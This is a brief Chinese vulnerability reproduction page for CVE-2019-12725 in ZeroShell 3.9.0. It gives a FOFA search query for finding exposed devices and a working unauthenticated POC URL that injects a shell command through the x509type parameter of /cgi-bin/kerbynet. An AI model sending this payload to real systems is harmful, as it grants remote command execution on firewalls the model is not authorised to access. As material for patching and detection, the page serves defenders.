# ZeroShell 3.9.0 远程命令执行漏洞 CVE-2019-12725
## 漏洞描述
ZeroShell 3.9.0 存在命令执行漏洞,/cgi-bin/kerbynet 页面,x509type 参数过滤不严格,导致攻击者可执行任意命令
## 漏洞影响
> ZeroShell < 3.9.0 ## FOFA > app=”Zeroshell-防火墙”
## 漏洞复现
登录页面如下
[![img](/static/qingy/ZeroShell_3.9.0_远程命令执行漏洞_CVE-2019-12725/img/zm-2.png)
验证的POC为
“`
/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27
“`
![zm-1](/static/qingy/ZeroShell_3.9.0_远程命令执行漏洞_CVE-2019-12725/img/zm-1.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容